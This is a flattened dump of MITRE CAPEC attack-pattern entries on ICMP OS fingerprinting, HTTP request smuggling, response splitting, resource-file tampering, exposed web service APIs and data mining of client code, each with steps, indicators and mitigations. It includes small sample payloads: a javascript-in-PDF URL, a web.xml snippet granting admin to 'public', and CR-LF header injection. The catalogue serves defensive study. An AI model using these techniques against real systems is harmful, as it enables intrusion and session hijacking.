1122
Data
"A TCP SHOULD allow a received RST segment to include data. It has been suggested that a RST segment could contain ASCII text that encoded and explained the cause of the RST. No standard has yet been established for such data" data
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or "Quoted" from the originating request that generated the ICMP error message. For this purpose "Port Unreachable" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply. This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: "Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...]." This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because "older" or "legacy" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable"
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
316
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Ofir Arkin
A Remote Active OS Fingerprinting Tool using ICMP
The Sys-Security Group
April 2002
http://ofirarkin.files.wordpress.com/2008/11/login.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
HTTP Request Smuggling results from the discrepancies in parsing HTTP requests between HTTP entities such as web caching proxies or application firewalls. Entities such as web servers, web caching proxies, application firewalls or simple proxies often parse HTTP requests in slightly different ways. Under specific situations where there are two or more such entities in the path of the HTTP request, a specially crafted request is seen by two attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it.
Identify HTTP parsing chain
Determine the technologies used in the target environment such as types of web servers, application firewalls, proxies, etc.
Investigation of the target environment to determine the types of technologies used to parse the incoming HTTP requests. Attempt to understand the parsing chain traversed by the incoming HTTP request.
env-Web
Full HTTP parsing chain for the application has been identified
Probe for vulnerable differences in HTTP parsing chain
Attacker sends malformed HTTP Requests to the application looking for differences in the ways that individual layers in the parsing chain parse requests. When differences are identified, the attacker crafts specially malformed HTTP requests to determine if the identified parsing differences will allow extra requests to be smuggled through parsing layers.
Create many consecutive requests to the server. Some of which must be malformed.
env-Web
Use a proxy tool to record the HTTP responses headers.
env-Web
At some point, the server is waiting for more request information to send the last response.
env-Web
No response is being received.
env-Web
Malformed HTTP requests are being totally ignored.
env-Web
Responses are being sent even if the HTTP header is incomplete.
env-Web
One layer in the application's HTTP parsing chain processes HTTP Requests that other layers do not. The server smuggles the user request into the last attacker's request and transport data such as cookie, etc.
The server replies with an error to the last attacker's request.
No response for the last incomplete request from the attacker by the server
Monitor requests to the server that seem malformed.
Cache poisoning
The attacker decides to target the cache server. The server will then cache the request and serve a wrong page to a legitimate user's request. The malicious request will most likely exploit a Cross-Site Scripting or another injection typed vulnerability.
Leverage the vulnerabilities identified in the Experiment Phase to inject malicious HTTP request that contains HTTP Request syntax that will be processed and acted on by the outer parsing layer of the cache server but not by the inner application layer. In this way it will be cached by the server without obvious sign from the application and the corrupt data will be served to future requesters.
env-Web
The attacker gets the users to be served with this cached malicious HTTP request.
Monitor server logs for consecutive suspicious HTTP requests.
Session Hijacking
The attacker decides to target the web server by crafting a malicious HTTP Request containing a second HTTP Request using syntax that will not be processed and acted on by an outer "filter" parsing layer but will be acted on by the inner web server/application processing layers. The application/web server will then act on the malicious HTTP Request as if it is a valid request from the client potentially subverting session management.
Leverage the vulnerabilities identified in the Experiment Phase to inject malicious HTTP request that contains HTTP Request syntax that will not be processed and acted on by the outer parsing layer of the malicious content filters but will be by the inner application/web server layer. In this way it will be acted on by the application/web server as if it is a valid request from the client.
env-Web
The attacker gets the application/web server to act on the malicious HTTP request and allows the attacker to gain control of the target user's session.
Monitor server logs for consecutive suspicious HTTP requests.
An additional HTTP entity such as an application firewall or a web caching proxy between the attacker and the second entity such as a web server
Differences in the way the two HTTP entities parse HTTP requests
High
Medium
Protocol Manipulation
Injection
When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks.
CVE-2006-6276
Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both "Content-Length" and a "Transfer-Encoding: chunked" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with "Transfer-Encoding: chunked" header without replacing the existing "Content-Length" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with "Content-Length: 0".
CVE-2005-2088
High
The attacker has to have detailed knowledge of the HTTP protocol specifics and must also possess exact details on the discrepancies between the two targeted entities in parsing HTTP requests.
None
If system documentation is available, the attacker can look up the exact versions of the two targeted entities, since different versions of the same system often behave differently. The attacker can also use product-specific documentation to figure out differences in parsing HTTP requests between the two entities.
In case where no documentation is available, the attacker needs to reliably fingerprint the targeted entities to discover the nature and version of the entities. Having done this, the attacker then needs to experimentally determine how the two entities differ in parsing requests.
Differences in requests processed by the two entities. This requires careful monitoring or a capable log analysis tool.
HTTP Request Smuggling is usually targeted at web servers. Therefore, in such cases, careful analysis of the entities must occur during system design prior to deployment. If there are known differences in the way the entities parse HTTP requests, the choice of entities needs consideration.
Employing an application firewall can help. However, there are instances of the firewalls being susceptible to HTTP Request Smuggling as well.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
HTTP requests that are interpreted and parsed differently by the targeted entities.
HTTP request to be smuggled through the first entity to the second one.
The application server behind another HTTP entity
The impact of activation is that a particular request that was not supposed to pass through the first entity is received by the second entity who responds to it. This can defeat protection against malware or lead to Cross-Site Scripting
444
Targeted
436
Secondary
707
Targeted
1000
Attack Pattern
ChildOf
220
333
Category
HasMember
359
System integration testing must include security checks to protect against Multiple Interpretation Errors across systems.
Economy of Mechanism
Securing the Weakest Link
Carefully Study Other Systems Before Incorporating Them into Your System
Design Configuration Subsystems Correctly and Distribute Safe Default Configurations
Penetration
Medium
Medium
Low
Client-Server
n-Tier
All
All
All
Common Weakness Enumeration (CWE)
CWE-444 - HTTP Request Smuggling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/444.html
Common Weakness Enumeration (CWE)
CWE-436 - Multiple Interpretation Error
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/436.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or "Quoted" from the originating request that generated the error message. For this purpose "Port Unreachable" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable."
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
316
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Ofir Arkin
A Remote Active OS Fingerprinting Tool using ICMP
The Sys-Security Group
April 2002
http://ofirarkin.files.wordpress.com/2008/11/login.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable" error message. RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart.
1. The IP total length field may be calculated correctly.
2. An operating system may add 20 or more additional bytes to the length calculation.
3. The operating system may subtract 20 or more bytes from the correct length of the field
4. The IP total length field is calculated with any other incorrect value.
This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
316
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Ofir Arkin
A Remote Active OS Fingerprinting Tool using ICMP
The Sys-Security Group
April 2002
http://ofirarkin.files.wordpress.com/2008/11/login.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are 3 behaviors that can be used to distinguish remote operating systems or firmware.
The IP ID field is echoed back identically to the bit order of the ID field in the original IP header.
The IP ID field is echoed back, but the byte order has been reversed.
The IP ID field contains an incorrect or unexpected value.
Different operating systems will respond by setting the IP ID field differently within error messaging. This allows the attacker to construct a fingerprint of specific OS behaviors.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
316
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Ofir Arkin
A Remote Active OS Fingerprinting Tool using ICMP
The Sys-Security Group
April 2002
http://ofirarkin.files.wordpress.com/2008/11/login.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack uses a maliciously-crafted HTTP request in order to cause a vulnerable web server to respond with an HTTP response stream that will be interpreted by the client as two separate responses instead of one. This is possible when user-controlled input is used unvalidated as part of the response headers. The target software, the client, will interpret the injected header as being a response to a second request, thereby causing the maliciously-crafted contents be displayed and possibly cached.
To achieve HTTP Response Splitting on a vulnerable web server, the attacker:
Spider
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links, the forms and all potential user-controllable input points for the web application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL, forms found in the pages (like file upload, etc.).
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are transported through HTTP
env-Web
The application uses redirection techniques (HTTP Location, etc.)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of user-controllable input entry points is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt variations on input parameters
The attacker injects the entry points identified in the Explore Phase with response splitting syntax and variations of payloads to be acted on in the additional response. He records all the responses from the server that include unmodified versions of his payload.
Use CR\LF characters (encoded or not) in the payloads in order to see if the HTTP header can be split.
env-Web
Use a proxy tool to record the HTTP responses headers.
env-Web
The web server uses unvalidated user-controlled input as part of the response headers
env-Web
The CR\LF characters are passed in the HTTP header and two responses are generated for a single request.
All CR\LF characters are consistently re-encoded or stripped before being written in the HTTP header
The size of the payload is being limited by the server-side application.
Some sensitive characters are consistently encoded, but others are not.
Monitor input to web servers (not only GET, but all in the inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on CR\LF characters.
Do not use user-controllable inputs in HTTP headers
Filter CR/LF syntax out of any user-controllable input utilized in HTTP headers.
Actively monitor the application and either deny or redirect requests from origins that appear to be generating HTTP Response Splitting attacks.
Cross-Site Scripting
As the attacker succeeds in exploiting the vulnerability, he can choose to attack the user with Cross-Site Scripting. The possible outcomes of such an attack are described in the Cross-Site Scripting related attack patterns.
Inject cross-site scripting payload preceded by response splitting syntax (CR/LF) into user-controllable input identified as vulnerable in the Experiment Phase.
env-Web
The malicious script is executed within the user's context.
Monitor server logs for consecutive suspicious HTTP request
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Cache poisoning
The attacker decides to target the cache server by forging new responses. The server will then cache the second request and response. The cached response has most likely an attack vector like Cross-Site Scripting; this attack will then be serve to many clients due to the caching system.
env-Web
System performs caching of HTTP responses
env-Web
The attacker gets the users to be served with this cached malicious HTTP response.
Monitor server logs for consecutive suspicious HTTP requests.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
User-controlled input used as part of HTTP header
Ability of attacker to inject custom strings in HTTP header
Insufficient input validation in application to check for input sanity before using it as part of response header
High
Medium
Injection
Protocol Manipulation
In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive.
CVE-2006-0207
High
The attacker needs to have a solid understanding of the HTTP protocol and HTTP headers and must be able to craft and inject requests to elicit the split responses.
None
With available source code, the attacker can see whether user input is validated or not before being used as part of output. This can also be achieved with static code analysis tools
If source code is not available, the attacker can try injecting a CR-LF sequence (usually encoded as %0d%0a in the input) and use a proxy such as Paros to observe the response. If the resulting injection causes an invalid request, the web server may also indicate the protocol error.
The only indicators are multiple responses to a single request in the web logs. However, this is difficult to notice in the absence of an application filter proxy or a log analyzer. There are no indicators for the client
To avoid HTTP Response Splitting, the application must not rely on user-controllable input to form part of its output response stream. Specifically, response splitting occurs due to injection of CR-LF sequences and additional headers. All data arriving from the user and being used as part of HTTP response headers must be subjected to strict validation that performs simple character-based as well as semantic filtering to strip it of malicious character sequences and headers.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
User-controllable input that forms part of output HTTP response headers
Encoded HTTP header and data separated by appropriate CR-LF sequences. The injected data must consist of legitimate and well-formed HTTP headers as well as required script to be included as HTML body.
API calls in the application that set output response headers.
The impact of payload activation is that two distinct HTTP responses are issued to the target, which interprets the first as response to a supposedly valid request and the second, which causes the actual attack, to be a response to a second dummy request issued by the attacker.
113
Targeted
697
Targeted
707
Targeted
713
Targeted
74
Secondary
1000
Attack Pattern
ChildOf
220
333
Category
HasMember
358
All client-supplied input must be validated through filtering and all output must be properly escaped.
Reluctance to Trust
Never trust user-supplied input.
Penetration
High
High
Low
Client-Server
n-Tier
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-113 - HTTP Response Splitting
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/113.html
Common Weakness Enumeration (CWE)
CWE-74 - Injection
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/74.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)
http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.
The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality.
< security-constraint>
<description>Security processing rules for admin screens</description>
<url-pattern>/admin/*</url-pattern>
<http-method>POST</http-method>
<http-method>GET</http-method>
<auth-constraint>
<role-name>administrator</role-name>
<role-name>public</role-name>
</auth-constraint>
</security-constraint>
The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
The attacker must have the ability to modify non-executable files consumed by the target software.
Very High
High
Injection
API Abuse
Modification of Resources
Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix "cp" command can be rerouted to "rm" or other standard command so the user's intention is subverted.
Low
To identify and execute against an over-privileged system interface
Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.
Design: Enforce principle of least privilege
Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.
Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.
Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.
Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Non-executable files
Executable code
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
94
Targeted
96
Targeted
95
Targeted
97
Targeted
272
Secondary
59
Secondary
282
Secondary
275
Secondary
264
Secondary
270
Secondary
714
Targeted
CVE-2004-0200
1000
Attack Pattern
PeerOf
23
1000
Attack Pattern
PeerOf
75
1000
Attack Pattern
ChildOf
165
Exploitation
Medium
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker searches for and invokes Web Services APIs that the target system designers did not intend to be publicly available. If these APIs fail to authenticate requests the attacker may be able to invoke services and/or gain privileges they are not authorized for.
Discover a web service of interest, by exploring web service registry listings or by connecting on known port or some similar means
Authenticate to the web service, if required, in order to explore it.
Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.
The architecture under attack must publish or otherwise make available services, of some kind, that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere.
The service need not be 'discoverable' but in the event it isn't, must have some way of being discovered by an attacker.
This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service.
High
Medium
Analysis
API Abuse
To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers "will not know services exist" and that "even if they did, they wouldn't be able to access them because they're not on the local LAN." Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions.
Low
A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that he can sniff/monitor for.
No special resources are required in order to conduct these attacks. Web service digging tools may be helpful.
Probing techniques should often follow normal means of identifying services. Attackers will simply have to execute code that sends the appropriate interrogating SOAP messages to suspected UDDI services (in web-services scenarios). Attackers will likely want to detect and query the organization's SOA Registry.
Probing techniques become more difficult when the service isn't advertised, or doesn't leverage discovery frameworks such as UDDI or the WS-I standard. In these cases, sniffing network traffic may suffice, depending on whether or not discovery occurs over a protected channel.
Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
306
Targeted
693
Targeted
695
Targeted
1000
Attack Pattern
ChildOf
113
Authenticate every request or message to a service
Do not rely on lack of discoverability to protect privileged functions within the service
Never Assuming that Your Secrets Are Safe
Complete Mediation
Use Authorization Mechanisms Correctly
Use Authentication Mechanisms, Where Appropriate, Correctly
Penetration
High
Medium
Low
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker can resort to stealing data embedded in client distributions or client code in order to gain certain information. This information can reveal confidential contents, such as account numbers, or can be used as an intermediate step in a larger attack (such as by stealing keys/credentials).
Identify Target
Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), or other machine code.
Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Proprietary or sensitive data is stored in a location ultimately distributed to end users.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Access to binary code is not realistic. For example, in a client-server environment, binary code on the server is presumed to be inscrutable to an attacker unless another vulnerability exposes it.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
The attacker identifies one or more files or data in the software to attack.
Obfuscation can make the observation and reverse engineering more difficult. It is only capable of delaying an attacker, however, not preventing a sufficiently motivated and resourced one.
Apply mining techniques
The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to extract the information of interest.
API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
env-Local env-Embedded
Cryptanalysis. The attacker performs cryptanalysis to identify data in the client component which may be cryptographically significant. (Key material frequently stands out as very high entropy data when compared to other mundane data). Given cryptographically significant data, other analyses are performed (e.g., length, internal structure, etc.) to determine potential algorithms (RSA, ECC, AES, etc.). This process proceeds until the attacker reaches a conclusion about the significance and use of the data.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
env-All
Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, he attempts decoding in that format.
env-All
Well known data types are used and embedded inside the client-accessible code.
env-Local env-Embedded env-ClientServer env-Peer2Peer
Proprietary data encodings are used. Although this incrementally increases the difficulty for an attacker to decode the data, it provides no better protection than well-known data types. Since few software developers are trained in obfuscation and cryptography, most proprietary encodings add little security value.
env-Local env-Embedded env-ClientServer env-Peer2Peer
The attacker extracts useful information.
The software can contain an update mechanism, key management mechanism, or other means of updating proprietary data. Although this can react to a single breach, it is not an effective continuing solution. Many software manufacturers are lured into a repeated update cycle (c.f., satellite TV providers, iPhone) as adversaries break proprietary data protection schemes. Planning to issue corrections is a poor long-term strategy, but it can be an effective stopgap measure until a design-level correction can be made.
In order to feasibly execute this class of attacks, some valuable data must be present in client software.
Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, cryptanalytic, or other attack.
Very High
Very High
Analysis
Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.
An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.
Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user.
Medium
The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution
The attacker must possess access to the client machine or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as "Strings" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources.
Attackers may confine (and succeed with) probing as simple as deleting a cache or data file, or less drastically twiddling its bits and then testing the mutation's effect on an executing client.
At the other extreme, attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through white box analysis, such as review of reverse-engineered code.
Confidentiality
Read application data
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
